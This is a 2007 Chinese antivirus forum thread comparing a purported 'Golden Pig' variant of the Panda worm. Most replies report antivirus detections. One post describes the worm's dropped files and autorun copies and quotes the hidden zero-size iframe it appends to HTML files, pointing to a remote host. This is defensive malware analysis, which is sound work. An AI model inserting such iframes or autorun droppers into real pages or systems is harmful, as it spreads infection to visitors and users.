楼主: vmzy
收起左侧

[病毒样本] 今天下午拿到的熊猫新变种--金猪!

[复制链接]
oscicar
发表于 2007-1-24 09:54:08 | 显示全部楼层
...

评分

参与人数 1经验 -2 收起 理由
周杰伦 -2 纯表情回复

查看全部评分

rinideniu
发表于 2007-2-1 11:07:57 | 显示全部楼层
我没种
turkey2k6
发表于 2007-2-1 13:27:00 | 显示全部楼层
假金猪一个,不过是老版本的熊猫换了个金猪图标,或者是另外一个版本的金猪。这个会在c:\windows\system32\drivers\下生成sppoolsv.exe文件,就是病毒本身,而不是网上说的ncscv32.exe,感染过的目录中生成desktop_.ini,也不是网上说的desktop__.ini,病毒还会在每个盘根目录下生成setup.exe和autorun.inf,且这个病毒不检查是否运行于虚拟机中,真金猪是会检查的,探测到虚拟机会自动退出。这个病毒在htm文件尾部添加的是<iframe src=http://music.netxshell.com/w/et.htm width=0 height=0></iframe>,仍旧不是网上说的<iframe src=http://www.lovebak.com/qq.htm width="0" height="0"></iframe>

而且病毒体内也找不到下面这些字样
asdf
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
adsf
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
hjjjjjj
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx!


所以说这个要不就是假金猪,要不就是另外一个版本的金猪
vincenthm
发表于 2007-2-1 14:14:14 | 显示全部楼层
这个我的卡巴报了,还给清除了,微点也报了
ibm255
发表于 2007-2-1 14:43:50 | 显示全部楼层
卡巴报307报警
晃晃悠悠
发表于 2007-2-1 14:46:53 | 显示全部楼层
nod32报,AVG报,测试通过
lacmiu
发表于 2007-2-1 17:22:37 | 显示全部楼层

看看
菜鸟想发飚
发表于 2007-2-1 22:57:26 | 显示全部楼层
怎么我的两杀软那么牛  哈     我的卡巴、微点都报了   轻轻松松就把它给干掉了
cmttd
发表于 2007-2-2 10:29:45 | 显示全部楼层
看来众说不一呀~~
ykz1991
发表于 2007-2-2 13:29:03 | 显示全部楼层
咖啡报了呀!我的是2007安全套装。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-1 00:40 , Processed in 0.094648 second(s), 16 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表